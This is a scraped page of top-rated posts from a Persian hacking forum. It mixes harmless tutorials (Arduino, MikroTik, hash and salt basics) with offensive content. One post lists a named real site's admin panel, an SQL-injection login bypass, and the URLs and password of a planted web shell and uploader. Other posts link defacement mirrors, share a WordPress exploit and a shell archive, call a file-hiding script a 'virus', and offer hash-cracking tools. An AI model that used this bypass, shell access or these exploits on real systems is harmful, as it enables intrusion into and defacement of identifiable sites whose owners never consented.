discord icon
سرور دیسکورد گاردایران

پرچمداران

  1. RT3N

    RT3N

    مدیر تیم


    • امتیاز

      13

    • تعداد ارسال ها

      539


  2. C0d3!Nj3ct!0n

    C0d3!Nj3ct!0n

    مدیریت کل سایت


    • امتیاز

      10

    • تعداد ارسال ها

      547


  3. DEDSEC303

    DEDSEC303

    کاربر تازه وارد


    • امتیاز

      9

    • تعداد ارسال ها

      7


  4. HACKER-12302

    HACKER-12302

    کاربر تازه وارد


    • امتیاز

      8

    • تعداد ارسال ها

      26



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در شنبه, 22 خرداد 1400 در همه بخش ها

  1. 5 امتیاز
    ویروس مخفی کردن فایل های ویندوز با پایتون و نوت پد سلام به همه دوستان و عزیزان با نوشتن و اجرای این کد در نوت پد ویندوز می توانید فایل های همسایه و داخل فایل ویروس رو مخفی کنید Attrib +h +s +r فایل را با فرمت bat. ذخیره کنید .................................................................. برای نوشتن آن در پایتون به صورت ویروس از دستورات زیر استفاده می شود : import os os.system("Attrib +h +s +r") میتونید کلی آپشن و قابلیت بهش اضافه کنید با تشکر از همه دوستان ss.py
  2. 4 امتیاز
    سلام میخوام تویه چند قسمت برنامه نویسی با اردینو رو یاد بدم اگر نمیدونید اردینو چیه و اینترنت اشیا چیه توی انجمن خیلی از دوستان توضیح دادن بریم سراغ اموزش تابع Setup : Setup() برای مقدار دهی اولیه متغیر ها حالت های پین و استفاده از کتابخانه ها استفاده میشه فقط یک بار وقتی که بورد شروع به کار کنه اجرا میشه تابع Loop : همینطور که از اسمش پیداس عملکردی به صورت متوالی داره🙂 متد begin : برای اماده سازی پورت سریال روی baudrate مورد نظره تا بتونیم خروجی کد رو ببینیم مثال پایین void setup(){ Serial.begin(9600); } که البته برا شما یه کامنتم هست مهم نیس البته بزارید باشه الان با این کد بالا یه ارتباط سریالی تنظیم یا ست کردم حالا بریم کد بعد یه Hello World بگیم تا رسم برنامه نویسا پای مال نشه😉 void setup(){ Serial.begin(9600); Serial.print("Hello World"); } void loop(){ } خب در مورد کد بالا اگه تو قسمت loop مینوشتید یه اسپمر تولید میکردین😅 خب درمورد print این کد وقتی استفاده بشه میره ادامه همون خط ولی... اگه از println استفاده کنید میره خط بعدی مثل Console.WriteLine تو سی شارپ برا کسایی که کار کردن راستی بهتره یه مقدمه ای از سی پلاس پلاس داشته باشید من خودم خیلی کم بلدم ولی چون سی شارپ کار کردم کمکم کرد شما هم اگر از زبانی مثل پایتون که سادس بلند شید بیاین اذیت میشین در اخر هم روی اپلود بزنید تا نتیجه رو ببینید هر بار که برد ریست شه باز دستورات تابع setup از اول میشه دوستان فقظ من کامنت اینجا نمیخونم متاسفانه ولی اگر سوال داشتید اینستا دایرکت بدید جواب میدم🙂 aryo_net
  3. 3 امتیاز
    SRX

    ساخت کریپتر

    سلام برید به تاپیک باج افزار نویسی اگه میخواین یه متن رو انکریپت کنین جلسه اول، ویدیو اول رو ببینید. اگر هم میخواین یک فایل رو انکریپت کنید جلسه اول، ویدیو دوم رو مشاهده کنید. میتونید از تکینتر(Tkinter) یا پایکیوتی(PyQt) برای ساخت یک محیط گرافیکی استفاده کنید. چندبار بهتون موردی رو یادآوری کردم... عزیز پروفایل و یوزر شما در انجمن شباهت زیادی با کداینجکشن اصلی داره. خوهشا تغیرش بدید(این موضوع با بند14 قوانین انجمن مغایرت داره) موفق باشید🌹
  4. 3 امتیاز
    (DEDSEC( WATCH-DOGS 2 🎮-💀-☺️
  5. 2 امتیاز
    SRX

    ساخت کریپتر

    نه منتظر بودم تو بیای به من بفهمونی چته مردحسابی؟؟؟ تا الان بیخود و بی جهت هرچی گفتی بدون اینکه حق باشه به خودم گرفتم و چیزی رو گردن تو ننداختم. هر بار هم از دفعه قبل بدتر رفتار میکنی انگار ما یه مشت برنامه نویس هستیم که نشستیم فقط به سوالای جنابعالی جواب بدیم جمع کن خودتو بابا اگه منتظری کسی بیاد بگه با فلان کتابخونه تو پایتون میتونی همچین کاری کنی، خیلی صبر نکن. اونی که کریپتر های پرایوت داره نمیاد مفت بزاره جلوی ادمایی مثل تو که فقط دنبال لقمه حاظر و اماده این . یکی اومده میگه فلان دوره آموزشی رو میخوام، دوست ندارم براش پول بدم برام بفرست. منم گفتم نه.تا میتونه فحش میده، چیزی نمیگم. جالبش اینجاست چند روز پیش باز تو انجمن فعالیت داشت. نمیدونم باچه رویی یه بچه 13ساله اینجور رفتار می کنه و باز روش میشه راست راست بیاد و بازم اسپم کنه یکی میاد مثه برده با ادم رفتار میکنه باز دهنمو میبندم یه نفر میاد میگه کمک کن فلان سورس رو کامل کنم، میگم الان نمیتونم فحش میده میره باز یه نفر دیگه میاد به قول خودش ادعای هکر بودن میکنه و یه سری اموزش که معلوم نیست مال چند دهه قبل هست رو میزاره تو انجمن، بعد که میای بهش تذکر میدی بهش برمیخوره و فحش میده. مدرک میزاری جلوش قبول نمی کنه و باز فحش میده پسره کلا شش ماه نیست برنامه نویسی رو شروع کرده اومده میگه میخوای بهت درس بدم! بعضیا هم که تا چهار تا خط کد حاظر و آماده پیدا میکنن و به زور حفظش میکنن فکر می کنن دیگه اینترنت تو مشتشونه و میتونن همه چیزو کنترل کنن . تاحالا تو انجمن به صراحت اینطور حرف نزدم ولی دیگه شورشو دراورن بعضیا یقینا تاپیک قفل یا حذف میشه.. ولی ازحالا منم به کسانی که اینطور رفتار می کنن در خور شخصیت خودشون بهشون جواب میدم. یاعلی
  6. 1 امتیاز
    با سلام به شما دوست عزیز برای این کار باید فایل خود را به فرمت exe تبدیل کنید میتونید آموزش تبدیل فایل پایتون به exe را در هر سایتی به صورت رایگان و آسان پیدا و استفاده کنید با تشکر
  7. 1 امتیاز
    Lars

    سوال

    سلام سیستمم مدتی هست که هک شده و من به تازگی یک اسنیف شبکه انجام دادم و فایلش رو ذخیره کردم تا پلیس فتا تحلیلش کنه و ببینه نفوذ کننه کیه؟میخواستم ببینم آیا پلیس فتا رسیدگی میکند؟چون تا بحال به پلیس فتا شکایت نکردم.ممنون
  8. 1 امتیاز
    Dr.Gaster

    سوال

    سلام دوست عزیز اول اینکه مطمن هستید که سیستمتون هک شده؟ چه تغیرات غیرعادی تو سیستمتون مشاهده میکنین؟ و اینکه نظر شحصی من اینه که فتا به سیستم های شخصی رسیدگی نمیکنه بهتره یه انتی ویروس نصب کنین تا تهدیدات احتمالی رو از سیستمتون شناسایی و حذف کنه ولی اگه مشکل باز هم ادامه داشت شاید مجبور بشین سیستم رو ریست کنین و سیستم عاملتون رو از اول نصب کنین { برای اینکه روت کیت ها از بین برن}
  9. 1 امتیاز
    SRX

    نصب wine

    سلام از اونجایی که تازه وارد لینوکس شدید تذکر نمیدم! لینوکس ها از نظر نصب نرم افزار فرقی خاصی با هم ندارن. نصب wine روی کالی یا آرچ یا پاروت یا ... فرقی نداره. همه ترمینال دارن و ... مثلا برای نصب wine دستورات زیر رو وارد کنید: sudo apt update sudo su # اگر یوزر روت نیست dpkg --add-architecture i386 apt-get update apt-get install wine32 یا اینکه دستور زیر رو بزنید تا همه کار ها رو خودش پشت سرهم انجام بده. sudo dpkg --add-architecture i386 && apt-get update && apt-get install wine-bin:i386 البته با توجه به معماری سیستم باید نصب بشه (x32 یا x64) اگر باز هم مشکلی بود بگید تا من یا دیگر دوستان راهنمایتان کنیم. امیدوارم مفید واقع شده باشه🌹
  10. 1 امتیاز
    حمله سایبری یک گروه هکر به شرکت بیمه "شیربیت" اسرائیل، موجب درز اطلاعات شخصی هزاران صهیونیست از جمله برخی مقامات ارشد رژیم اشغالگر شده است. روزنامه "اسرائیل‌ هیوم" نوشت: گروهی که حدود یک‌ماه است تشکیل شده، عامل حمله بوده است. و همچنین : هکر‌های ایران با جعل هویت رئیس سابق واحد اطلاعات ارتش اسرائیل، اقدام به دریافت تحلیل‌ پژوهشگر امنیتی عضو اندیشکده صهیونیستی «آلما» نمودند.
  11. 1 امتیاز
    amoudi

    cmd Sh3ll

    اینم شل cmd cmd.rar
  12. 1 امتیاز
    همین لینکی که قرار دادید قبلا تو انجمن بوده و سالمه و روی ویندوز 10 هم شخصا تست کردم و جواب داده . طبق توضیحات کامنت زیر عمل کنید : اینکه بشه یه سایتی رو هک کرد باید ببینید سایت مورد نظر چه باگی داره و بسته به اون باگ حمله خودتونو آغاز کنید. برای پیدا کردن لینک ابزارتون هم که میتونستید به راحتی با سرچ تو گوگل پیدا کنید ! نیازی نبود تو انجمن سرچ بزنید.
  13. 1 امتیاز
    سلام من یک کاربر خیلی تازه واردم و فقط تا هک وایفا با بروت فروس و wps و هک wpa2آشنایی دارم و درباره هک سایت ها با متاسپلویت آن چنان اطلاعاتی ندارم و حتی یک متاسپلویت دانلود کردم که موقع نصب هاست و اینجور چیزا ازم نخواست (نمی دونم چرا و شورتکات هم درست نکرد) با اصطلاحات متاسپلویت آشنا هستم اما کد هاش رو درست بلد نیستم دارم یاد میگیرم با متاسپلویت میشه سایت هایی مثل esam.ir رو هک کرد ؟ لطفا یک لینک متلسپلویت برای ویندوز 10 رو هم بزارید من توی انجمن نگاه کردم هیچ کدوم سالم نبودن و ارور 404 میدادن (حتی با پراکسی) لینکی که من ازش دانلود کردم رو میزارم شاید متاسپلویت نباشه لینک
  14. 1 امتیاز
    با عرض سلام. با آموزش باگ امنیتی نسبتا جدیدی در وردپرس نسخه 4.7 و 4.7.1 و 4.7.2 در خدمت شما هستیم. این آسیب پذیری با نام Wp COntent Injection یا Wp Reset API شناخته میشه.آسیب پذیری از سطح بالایی برخورداره به طوری که میتونیم بدونیم دسترسی به پنل ادمین سایت پست هارو ویرایش کنیم. من در آموزش از یک اکسپلویت به زبان پایتون استفاده میکنم و در فایل زیپ براتون قرار میدم. امیدوارم پست مفید واقع بشه. موفق باشید Exploit.rar Wp.part2.rar Wp.part1.rar
  15. 1 امتیاز
    DeMoN

    باگ جدید و قوی

    سلام. باگ های پابلیک اکثر تارگت ها باگ رو پچ کردن و اگر به دنبال جمع آوری آرشیو هستین بهتره خودتون دنبال کشف باگ باشین. ولی باگ های پابلیک که هنوز هست باگ های مثل wp content injection و wp job manager و باگ جوملا در کامپوننت com_user و com_registration هست که باگ های نسبتا جدیدی هستن. باگ های قدیمی هم مثل باگ در کامپوننت های جوملا com_media و com_fabrik و com_jce هستن و همچنین باگ Gravity Form در وردپرس که هنوز تارگت دارن. موفق باشید
  16. 1 امتیاز
    این صفحه دیفیسم درباره اسرائیله... iranian hackers.rar
  17. 1 امتیاز
    با سلام بیشتر وبمستران برای محافظت از پسورد وبسایت خود پسورد هارو به صورت هش ذخیره میکنند.در این اموزش شما رو با یکی از ابزار های تست امنیت اشنا میکنم که بسیار کاربردی هست....در این آموزش تصویری شما رو با کرک هش hash توسط یکی از ابزارهای کالی kali به نام findmyhash آشنا میکنم findmyhash یکی از قدرتمند ترین ابزار موجود جهت کرک انواع هش موجود هستش ازدست ندیدو از اون برای ایمن سازی سایت های خودتون استفاده کنید... پسورد: guardiran.org FINDMYHASH.rar
  18. 1 امتیاز
    منظورتون از فشرده چیه؟ابزار فشردست؟ این ابزار با api سایت های کرک هش کار میکنه و انلاینه و از قبل دیکشنری تمام الگوریتم های کرک هش رو نداره که . تایپیک اموزشیه . سوال رو در بخش مربوط بپرسین نظم حفظ شه
  19. 1 امتیاز
    این همون تابستونیه که داریم میترکونیم :|
  20. 1 امتیاز
    _RubicK_

    حواشی بازی pokemon go

    درود خب اگه یکم از بحث هک و امنیت خارج بشیم یکی از موارد متفرقه که اخیرا مث بمب تو دنیا صدا کرده بازی pokemon go محصول کمپانی نینتندو است که واقعا هم بازی جالبیه در اینجا تعدادی از حاشیه های این بازی رو قرار میدم و اگه استقبال بشه این تاپیک رو به مرور آپدیت میکنم ---------------- واکنش ها به بازی پوکمون گو Pokemon Go سی دقیقه از انتشار بازی نگذشته بود که یکی از بازیکن ها حین پیدا کردن پوکمونی به زمین افتاده و مجروح می شود. نکته جالب اینجاست براساس گفته فرد مذکور، این مجروحیت سطحی نیست و او باید حدود شش تا هشت هفته ریکاوری کند. مشابه این اتفاق زیاد افتاده است. سازمان های گوناگونی هم تاکنون هشدار داده اند که هنگام تجربه پوکمون گو تمام حواس خود را جمع کنید. دیگر از این عجیب تر نمی شود. بعضی کاربرها از تجربه پوکمون گو هنگام رانندگی خبر داده اند. همین مسئله موجب شده تا سازمان حمل و نقل واشنگتن در توییتر خود به بازیکن ها هشدار دهد زمان انجام پوکمون گو، رانندگی نکنید. تصور کنید فرد با پای پیاده صدمه می بیند، چه برسد سوار ماشین بوده و نقش یک راننده را داشته باشد. پوکمون گو در پیدا کردن یک جنازه هم نقش داشته است. روزی که یکی از کاربرهای این بازی برای پیدا کردن شخصیت ها تصمیم می گیرد به کنار رودخانه برود، متوجه جسدی شناور شده و با حالتی شوک آور به مسئولین مربوطه خبر می دهد. احتمالا علت مرگ به خاطر غرق شدن بوده است. این نکته را بگوییم که پوکمون ها به چند دسته مختلف تقسیم شده و هر کدام در مکان هایی با خصوصیات متفاوت هستند. بازی موجب ملاقات های ناخواسته هم شده است. یکی از کاربرهای وب سایت Reddit گزارش داده که تعداد بسیار زیادی از مردم برای پیدا کردن پوکمون ها به پارک محلی آن ها رجوع کرده و ناخواسته با یکدیگر ملاقات داشته اند. اگر کامنت های زیر پست را بخوانید، متوجه می شوید مشابه این اتفاق برای افراد دیگری هم افتاده است: ورود بعضی بازیکن ها به ایستگاه پلیسی واقع در استرالیا هم از دسته اتفاقات عجیبی است که این چند روز شاهد بودیم. در همین راستا، پلیس محلی در بیانیه ای از بازیکن ها خواهش کرد تا برای یافتن پوکمون ها به هر جایی نروند: «تقاضا داریم برای یافتن پوکمون ها به هر جایی نروید. شاید بد هم نباشد هنگام تجربه Pokémon Go نگاهی به اطراف بیندازید. پوکمون ها که به این زودی جایی نمی روند. در امنیت تمام پوکمون ها را بگیرید.» مردی به خاطر بازی پوکمون گو از کار تمام وقت خود استعفا داد یکی از بازیکن ها به صورت اتفاقی، هنگامی که زنش آماده زایمان می شود، پوکمونی با نام Pidgey را پیدا می کند. اخبار ترکیه یه عده رو نشون میداد شاکی بودن که مسجد جای پوکمون گرفتن نیست. "تو کالیفرنیا دو نفر در حین بازی پوکمون از صخره پرت شدن پایین" منبع:nagahan.com ------------------ خب اینم یه تعداد از اخبار و حواشی این بازی ان شا... در آینده اخبار بیشتری رو قرار میدم شاد باشید
  21. 1 امتیاز
    admin panel: http://www.thelotdepot.com/admin user pass : 1'or'1'='1 shell : http://www.thelotdepot.com/admin/files/shell.php password shell : guardiran file manage : http://www.thelotdepot.com/admin/files/40d7f830f89b6998088be67c9eacc6f7.php uploader guardiran : http://www.thelotdepot.com/admin/files/uploader.php
  22. 1 امتیاز
    mhdei1380

    هاستینگ

    لطفا رو این هاست ها امتحان کنید عالی هستن . Www.fagig.com www.my3gb.com http://www.ugig.ir/ http://zymic.com/ http://www.freehostia.com/ http://www.000webhost.com/ http://www.nazuka.net http://7host.com RipWay.com 110mb.com jimdo.com kilu.de http://www.orgfree.com/ http://www.sitesled.com/ www.freeserver.me www.xzn.ir www.ugig.ir www.gigfa.com www.xsa.ir www.hosta.ir www.megig.ir www.zgig.ir www.bdk.ir www.gigro.ir www.you-hosting.ir www.vatan-host.ir www.fagig.com www.zxn.ir www.night.ir
  23. 1 امتیاز
    http://www.aljyyosh.org/mirror.php?id=154147 http://www.aljyyosh.org/mirror.php?id=154146 http://www.aljyyosh.org/mirror.php?id=154143
  24. 1 امتیاز
    http://www.aljyyosh.org/mirror.php?id=153896
  25. 1 امتیاز
    http://www.aljyyosh.org/mirror.php?id=153707
  26. 1 امتیاز
    http://zone-hc.com/archive/mirror/891926f_caa.com.np_mirror_.html
  27. 1 امتیاز
    http://www.aljyyosh.org/mirror.php?id=153638 thank to Rex اینم برا تولدم که امروزه :دی . به اسم خودم زدم مشکلی واسم تیم پیش نیاد بابت قالب دیف : دی :/
  28. 1 امتیاز
    http://www.aljyyosh.org/mirror.php?id=152510 http://www.aljyyosh.org/mirror.php?id=152511
  29. 1 امتیاز
    با سلام دوست عزيز اين تاپيك مال يك ماه پيش هست لطفا به موضوعات قديمي پاسخ ندهيد! با تشكر
  30. 1 امتیاز
    ادامه پارت ها ..... توجه: همه پارت ها را دانلود کنید , سپس از حالت فشرده خارج کنید! moghadame.part05.rar moghadame.part06.rar
  31. 1 امتیاز
    با سلام و احترام خدمت تمامی عزیزان با آموزش های میکروتیک من بعد در خدمت شما هستیم امیدواریم که برای شما مفید باشد مقدمات مفیدی رو کاربر عزیز ، اقای wolf در مورد میکروتیک بیان کردند که خواندن آن پست خالی از لطف نیست. بنده هم به نوبه خودم اطلاعات دیگه ای از این برند خوب در اختیارتون قرار میدم شرکت میکروتیک در سال 1995 کار خودشو در صنعت فناوری اطلاعات در کشور لاتویا (لتونی) شروع کرده و تا به امروز تجهیزات کاملا خوب و پیشرفته و یوزرفرندلی ای رو عرضه کرده است که طرفداران بسیار زیادی اعم از مدیران شبکه و مبتدیان این راه عظیم و شیرین کسب نموده است. با برخی از توانایی های این برند آشنا بشیم : روتر و مسیریاب با قابلیت عملکر و سازگاری با پروتکل های استاندارد مسیریابی باشد ( استاتیک ، داینامیک ) . سویچ لایه ۳ و ۲ در سطح شبکه با قابلیت های فایروالینگ ( دیوار آتش ) را داشته باشد . روتر و مسیریاب وایرلس برای برقرار ارتباط های بیسیم و قادر به پشتیبانی از استاندارد های وایرلس و پروتکل های مختص این شرکت میباشد ( ۸۰۲٫۱۱a , 802.11b , 802.11g , 802.11n , Nstreme ) کنترل کننده پهنای باند و اولیت در عبور بسته های شبکه متناسب با فیلتر های مختلف ( آدرس آیپی ، دریافت کننده ، پروتکل و … ) را داشته باشد . متعادل کننده در مسیر ، روتر و پهنای باند را با استفاده از روش های متفاوت داشته باشد (Bonding , … ECMP , VRRP ) فایروال و دیوار آتش بسیار انعطافپذیر با قابلیت Stateful را داشته باشد ( Filtering , Nat , Mangle ) ارائه دهنده سرویس های ارتباط از راه دور و شبکه های مجازی را داشته باشد ( PPTP , L2TP , VLAN , SSTP , PPPOE ) پشتیبای از پروتکل Label Switching و ارتباط های اختصاصی در سطح لایه دو و سه شبکه ( MPLS , VPLS , VRF , TE , … ) راه اندازی سرویس های ارائه اینترنت بصورت فوری ( Plug & Play ) در شبکه های بی سیم و با سیم ( Hotspot ) مدیریت کاربران و سیستم های اکانتینگ برای یوزر ها در میکروتیک ( Radius Server , Radius Client , User Manager ) و قابلیت های بسیار فراوان دیگر … در بخشهای بعدی همین پست اشاره ای میکنیم به نحوه نامگذاری تجهیزات این شرکت ، انواع راه های اتصال به این تجهیزات ، معرفی پورتها و ... که با ما همراه باشید شاد و دل آرام باشید
  32. 1 امتیاز
    دوستان محترم حالتون خوبه ؟ بریم سراغ ادامه روند میکروتیک ؟؟ باشه میریم شکل زیر روتربورد RB951ui میکروتیک می باشد همونطور ک در بخش قبل راجع ب سیاست نامگذاری صحبت کردیم میشه اطلاعاتی رو از اسمش بدست اورد ؛ روتربورد سری 9 ، 5تا پورت اترنت داره ، 1 آنتن داخلی وایرلس داره ، پورت usb هم داره برای کانفیگ و پیکربندی این روتربوردها میکروتیک دوتا مد برا کاربراش در نظر گرفته ک باعث محبوبیت بیشترش شده و ب اصطلاح user friendly ترش کرده برخلاف سیسکو ک مد گرافیکی برا کانفیگ نداره و درگیر دستورات باس بشین ( ک البته اونم شیرینی خاص خودشو داره ) میکروتیک محیط گرافیکی برا کانفیگ داره و محیط متنی نحوه دسترسی : 1- گرافیکی با استفاده از برنامه Winboxهم میشه با ip وصل شد و هم با mac، ک اگ با ip وصل بشیم از پورت tcp 8291 استفاده میکنه ، از پورت udp 20561 هم برای اتصال با مک استفاده میکنه​​ با استفاده از Webfigاز پورت tcp 80 استفاده میکنه ، که باید آدرس IP میکروتیک رو در browser وارد کنیم تا دسترسی داشته باشیم​​ 2- متنی ​با استفاده از دستور telnet​از پورت tcp 23 استفاده میکنه با استفاده از دستور ssh​از پورت tcp 22 استفاده میکنه چرا پورتها رو میگیم ؟؟ دونستن این پورتها وقتی میخوایم فایروال رو کانفیگ کنیم خیلی ضروریه ، و ما هم از اول هر پروتکلی ک معرفی میکنیم ، از پورتی ک استفاده میکنه رو هم میگیم تا تو ذهنمون بمونه خودتون بعدا متوجه میشید ک چقد کاربرد خواهد داشت امیدوارم تا اینجای کار راضی کننده بوده باشه انشاءالله من بعد وارد محیط عملی میکروتیک خواهیم شد شاد و دل آرام
  33. 1 امتیاز
    ابزار ighashgpu که در فیلم بالا ازش استفاده شده رو ضمیمه کردم میتونید دانلود کنید و استفاده کنید..... Plain MD4, MD5, SHA1. NTLM Domain Cached Credentials Oracle 11g MySQL5 MSSQL vBulletin Invision Power Board and more نحوه استفاده (usage) : ighashgpu.exe [switch:param] [hashfile.txt] options: **************************************************************** *** MD4/MD5/SHA1 GPU Password Recovery v0.62 *** *** For ATI RV 7X0 cards and nVidia 'CUDA' ones (G80+) *** *** (c) 2009 Ivan Golubev, http://golubev.com *** *** see "readme.htm" for more details *** **************************************************************** *** Any commercial use of this program is strictly forbidden *** **************************************************************** IGHASHGPU.EXE [switch:param] [hashfile.txt] Switches: -c:csdepa Charset definition (caps, small, digits, special, space, all -u:[chars] User-defined characters -uh:[hex] User-defined character in HEX -uf:[filename] Load characters from file -sf:[password] Password to start attack from -m:[mask] Password mask -ms:[symbol] Mask symbol -min:[value] Minimum length -max:[value] Maximum length -h:[value] Hash to attack -t:[sha1 | md5 | md4 | md5x2 | mysql5 | md5x2s | ipb | dcc] Hash type -unicode -oem Convert charset to unicode or oem (default -- ANSI codepage) -devicemask:[N] Devices to use password: guardiran.org ighashgpu_v062.rar
  34. 1 امتیاز
    در این آموزش تصویری ما با استفاده از یکی از ابزار ها که با استفاده از کارت گرافیک سیستم (gpu) به کرک هش مورد نظر می پردازد شما رو اشنا میکنیم همونطور که بارها گفتم سرعت ابزارهایی که از gpu برای کرک استفاده میکنند بسیار بالاتر از ایزارهایی هستش که از cpu برای کرک استفاده میکنند نام ابزاری که فیلم آموزشی آن را در پایین ضمیمه کردم ighashgpu هستش که قادر میباشد هش های زیر را چه دارای salt باشند چه فاقد از salt را کرک کند.. فیلم به زبان ساده بیان شده و خود ابزار هم ضمیمه شد موفق باشید password: guardiran.org Video 2 gpu REX.rar
  35. 1 امتیاز
    خب من تعدادی از برترین سایت ها در زمینه کرک انوااع هش رو قرار میدم دوستان بعد از این پست آموزشهای تصویری کرک کردن با استفاده gpu که سرعت فوق العاده ای داره و اکثر کرکر های حرفه ای از آنها برای کرک استفاده میکنند رو قرار میدم موفق باشید... http://crypo.in.ua/tools/ http://www.md5decrypter.co.uk/ http://www.md5this.com/index.php http://md5hack.com/ http://www.miraclesalad.com/webtools/md5.php http://hash.online-convert.com/md5-generator http://md5decryption.com/ http://www.netmd5crack.com/cracker/ http://www.md5decrypter.com/ https://isc.sans.edu/tools/reversehash.html http://www.md5crack.com/ http://md5.web-max.ca/ http://www.md5.net/ http://www.cmd5.org/ http://md5pass.info/ http://md5.darkbyte.ru/ http://www.tydal.nu/article/md5-crack http://tools.benramsey.com/md5/ http://www.xmd5.org/index_en.htm http://www.hash-cracker.com/ http://www.md5.cz/ http://www.md5decryption.com/ http://www.adamek.biz/md5-generator.php http://www.whatsmyip.org/hash-generator/ http://www.hashemall.com/ http://hashgenerator.de http://blog.faultylabs.com/?d=md5 http://www.xorbin.com/tools/md5-hash-calculator https://www.functions-online.com/md5.html http://md5.com.cn/ http://tools.benramsey.com/md5/ http://www.cmd5.org/ http://www.crypo.com/ https://www.freerainbowtables.com/de/hashcracking/ http://www.insidepro.com/hashes.php?lang=rus http://www.md5.com.cn/ http://md5cracker.org/
  36. 1 امتیاز
    آخرین ورژن نرم افزار PasswordsPro که در فیلم اموزشی بالا از اون استفاده شده نیز ضمیمه شد password: guardiran.org PasswordsPro.part1.rar PasswordsPro.part2.rar PasswordsPro.part3.rar
  37. 1 امتیاز
    C0d3!Nj3ct!0n

    شروع هک

    درود قدم اول در هک آشنایی با زبان های php , html , c هست که بشما کمک زیادی میکنه در پیدا کردن باگ ها و رفع باگ. مرحله بعدی کار با لینوکس هست که باید با دستورات و ابزارهای آن آشنایی داشته باشین. و در آخر هم آشنایی با باگ های مختلف و چگونگی استفاده از آنها. در انجمن آموزش های مربوط هست و همچنین دوستان و اعضای تیم در حال ارسال پست های متعدد در این زمینه های مزبور می باشند. موفق باشید
  38. 1 امتیاز
    RT3N

    شروع هک

    سلام دوست عزیزم هک دنیای بزرگ با شاخه های فراون سوالتون خیلی کلی هستش اگه هدفتون server hacking یا هک و نفوذ به سایت ها و سرورها هست بنده یک تابیک ایجاد کردم و به زودی ابدیتش میکنم اینم لینکش : کلیک کنید تمامی مدیران و اعضای گاردایران سعی میکنند مطالب اموزشی رو از صفر و پایه شروع و تا حد پیشرفته پیش ببرند پیشنهاد میکنم صبور باشید و تاپیک های دوستان رو دنبال کنید تا علاقه خدتون رو پیدا کنید و انشالله به هدفتون برسید موفق باشید
  39. 1 امتیاز
    دوستان جای این مطلب واقعا خالی بود یادم رفته بود توضیحش بدم قبل از شروع آموزش های کرک حتما باید با این موضوع آشنا باشید با این سوال توضیحات رو شروع میکم... salt چیست؟؟؟! درست است وقتی بسورد ها رو هش میکنیم امنیت بالاتر میره اما برای اینکه باز هم امنیت بسورد بالاتر بره از salt استفاده میکنیم.. salt باعث میشود بیچیدگی در الگوریتم بیشتر شود که اگر بیچیدگی بیشتر شود رمزگشایی و کرک آن نیز سخت تر میشود در دنیای سایبری هیچوقت امنیت ۱۰۰ در ۱۰۰ تامین نمیشود بس نمیشه گفت رمزگشایی و کرک هش به همراه salt غیر ممکن میشود فقط کار برای نفوذگر و کرکر ها سخت تر از سخت میشود... خب به مثال زیر دقت کنید بسورد بدونه salt : guardiran md5 = dde309fb16a30f51b2ae4085f7ee0e49 خب حالا بسورد به همراه salt رو مشاهده کنید.. Hashed string: guardiran Salt: sesf055w3d5sew85 MD5 hash: 9d32ccd4b9c3e5961071a282a48e2e1f خب همانطور که مشاهده میکنید MD5 بدونه salt , با md5 دارای salt کاملا متفاوت از همدیگر هستند... salt به شکل ها مختلفی ایجاد میشود مثلا در cms جوملا به صورت زیر است password: 12345 e7d4aa4793a91a61bb1f1768095b765c:IEJh02NvSn0C2QmUmg0AuAEZSkgtk6Gv
  40. 1 امتیاز
    انواع هش هش ها انواع بسیار مختلفی دارند که به عنوان مثال نمونه هایی را مثال زدیم در پایین که از مشهورترین آنها و برکاربردترین انها md1 md2 md3 md4 md5 sha-1 را میتوان نام برد . بعضی از هش ها دستنویس هستند و نمیشه الگوریتم این نوع هش ها ( Hash Algoritm ) را بدست آورد و چون نفوذگر دسترسی به الگوریتم ندارد کرک کردن Hash Crack و بدست آوردن بسورد در این حالت غیر ممکن میشود انشاالله در بست های بعدی آموزش های تصویری را قرار میدهیم.. num of chars | type of hash | ex 016 MySQL: 7cd2b5942be28759 024 Haval128 (Base64): nkDtiD+2PphdKZtAzaK48g== 024 MD2 (Base64): 2oU7DT+I2ZswKDpp5t7Wuw== 024 MD4 (Base64): pEgBeq8h2FJfwQroeqZynQ== 024 MD5 (Base64): kAFQmDzST7DWlj99KOF/cg== 024 Tiger128 (Base64): 8ljB6IQUqypSerVB/8W4vw== 028 Haval160 (Base64): sh6HbE05HiqJdmEUnYNXa1UwoIk= 028 SHA-1 (Base64): qZk+NkcGgWq6PiVxeFDCbJzQ2J0= 028 Tiger160 (Base64): 8ljB6IQUqypSerVB/8W4v5Nfe5U= 032 .md5(md5($pass)): ec0405c5aef93e771cd80e0db180b88b 032 .md5(md5($pass).$salt): ec0405c5aef93e771cd80e0db180b88b 032 .md5(md5($salt).md5($pass)): 6b2e416060edbaa9d35302f13d3e1a6a 032 Domain Cached Credentials: bdaff79a8c1ec80aeda2b713127459bb 032 Haval128 (HMAC): 9e40ed883fb63e985d299b40cda2b8f2 032 Haval128_3: 9e40ed883fb63e985d299b40cda2b8f2 032 Haval128_4 cbeedc24a720eeebb519ebb74d150e29 032 Haval128_5 7d12652903d058b5501e6875d9d202d7 032 Haval192 (Base64): p7FMnvMJIxmw5147ILlX0YC/IHRWKeje 032 LM AAD3B435B51404EEAAD3B435B51404EE 032 MD2 (HMAC): da853b0d3f88d99b30283a69e6ded6bb 032 MD2: da853b0d3f88d99b30283a69e6ded6bb 032 MD4 (HMAC): a448017aaf21d8525fc10ae87aa6729d 032 MD4: a448017aaf21d8525fc10ae87aa6729d 032 MD5 (HMAC): 900150983cd24fb0d6963f7d28e17f72 032 MD5: 900150983cd24fb0d6963f7d28e17f72 032 NTLM: e0fba38268d0ec66ef1cb452d5885e53 032 RipeMD128 (HMAC): c14a12199c66e4ba84636b0f69144c77 032 RipeMD128: c14a12199c66e4ba84636b0f69144c77 032 SNEFRU128 (HMAC): 553d0648928299a0f22a275a02c83b10 032 SNEFRU128: 553d0648928299a0f22a275a02c83b10 032 Tiger128 (HMAC): f258c1e88414ab2a527ab541ffc5b8bf 032 Tiger128: f258c1e88414ab2a527ab541ffc5b8bf 032 Tiger192 (Base64): 8ljB6IQUqypSerVB/8W4v5Nfe5UcEylR 034 MD5 (Unix): $1$P2lE.rGp$SYCpUzBZjWRGKyMe/MbU00 037 MD5 (APR): $apr1$ZSc84vgF$YiKqBzqnUskAPKeDWlN8/0 040 Haval160 (HMAC): b21e876c4d391e2a897661149d83576b5530a089 040 Haval160: b21e876c4d391e2a897661149d83576b5530a089 040 Haval160_3 7da6a6938ac24f848f202e0ea7a3b5119eec2e6a 040 Haval160_4 6339f7fe0cbb724619f251f21c2662940bf9a6c6 040 Haval160_5 e79dbb57d907135ba95e892719446164c05497aa 040 Haval224 (Base64): 